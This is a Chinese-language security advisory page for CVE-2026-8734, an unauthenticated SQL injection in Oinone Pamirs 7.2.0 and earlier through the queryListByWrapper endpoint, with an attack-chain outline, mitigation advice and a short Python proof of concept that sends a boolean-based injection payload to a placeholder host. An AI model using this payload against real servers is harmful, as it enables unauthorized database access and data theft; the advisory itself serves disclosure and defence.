IPBUF安全漏洞报告
English
CVE-2026-8734 CVSS 7.3 高危

CVE-2026-8734 Oinone Pamirs SQL注入漏洞

披露日期: 2026-05-17

漏洞信息

漏洞编号
CVE-2026-8734
漏洞类型
SQL注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Oinone Pamirs

相关标签

SQL注入Oinone Pamirs远程漏洞高危漏洞RSQL

漏洞概述

Oinone Pamirs 7.2.0及之前版本存在高危SQL注入漏洞。该漏洞源于组件`queryListByWrapper`接口中的`RSQLToSQLNodeConnector.makeVariable`函数未能正确处理用户输入,允许攻击者通过构造恶意参数执行任意SQL语句。由于漏洞无需认证且可远程利用,攻击者可轻易窃取数据库数据或破坏系统完整性。目前厂商尚未响应,利用代码已公开,风险极高。

技术细节

漏洞核心在于Oinone Pamirs处理RSQL(RESTful Service Query Language)查询时的逻辑缺陷。在`RSQLToSQLNodeConnector.makeVariable`方法中,系统将用户可控的输入直接拼接到SQL查询语句中,未进行严格的类型检查或转义处理。攻击者可以通过发送特制的HTTP请求至`queryListByWrapper`接口,注入SQL元字符(如单引号、注释符)来改变原始查询逻辑。CVSS 3.1评分为7.3,表明攻击复杂度低,且无需用户交互。成功利用该漏洞可导致数据库信息泄露、数据篡改,甚至在特定情况下影响服务可用性。

攻击链分析

STEP 1
侦察
攻击者通过网络扫描识别出运行Oinone Pamirs且版本低于或等于7.2.0的目标服务器。
STEP 2
漏洞探测
向`queryListByWrapper`接口发送特制的RSQL查询参数,测试后端是否存在SQL解析异常。
STEP 3
漏洞利用
利用`RSQLToSQLNodeConnector.makeVariable`的缺陷,注入恶意SQL语句(如UNION SELECT)以提取敏感数据。
STEP 4
数据窃取或破坏
成功获取数据库权限后,导出用户信息、修改数据或通过耗尽资源影响系统可用性。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Replace with actual vulnerable endpoint) target_url = "http://target-host:port/api/queryListByWrapper" # Malicious payload exploiting the RSQLToSQLNodeConnector.makeVariable vulnerability # Attempting to perform a boolean-based SQL injection payload = { # The vulnerable parameter is likely part of the wrapper or query object "wrapper": "name==test' OR '1'='1" } headers = { "Content-Type": "application/json", "User-Agent": "CVE-2026-8734-Scanner" } try: # Send POST request to the vulnerable interface response = requests.post(target_url, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check response for SQL injection indicators.") print(f"[+] Response Body: {response.text[:500]}") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Oinone Pamirs <= 7.2.0

防御指南

临时缓解措施
如果无法立即升级,建议限制对`queryListByWrapper`接口的网络访问,仅允许可信IP调用,或通过WAF添加针对RSQL特殊字符的过滤规则以暂时阻断攻击路径。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表